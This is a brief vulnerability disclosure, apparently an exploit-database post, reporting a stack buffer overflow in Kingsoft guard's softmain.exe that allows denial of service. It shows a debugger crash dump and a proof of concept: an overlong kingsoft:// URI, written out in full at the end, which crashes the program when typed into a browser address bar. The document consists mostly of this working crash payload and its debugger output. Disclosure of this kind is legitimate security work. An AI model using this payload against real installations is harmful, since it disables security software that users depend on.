Kingsoft guard Stack Overflow Vulnerability (DoS attack allowed) Details: Kingsoft guard Stack Overflow Vulnerability
STATUS_STACK_BUFFER_OVERRUN encountered(1c50.1f10): Break instruction exception - code 80000003 (first chance)*** ERROR: Symbol file could not be found. Defaulted to export symbols for D:\program files (x86)\ksafe\softmain.exe - eax=00000000 ebx=00581728 ecx=76b00174 edx=0018cb8d esi=00000000 edi=00000000eip=76afff55 esp=0018cdd4 ebp=0018ce50 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246kernel32!GetProfileStringW+0x12a09:76afff55 cc int 3
The problem is here kernel32! The GetProfileStringW + 0x12a09 function has an error. Proof of vulnerability: Enter kingsoft: // 02131516 in the address bar of the browser and then enter:
kingsoft://02131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656vv021315165163056161065106560213151651630561610651065602131516516305616106510656vv02131516516305616106510656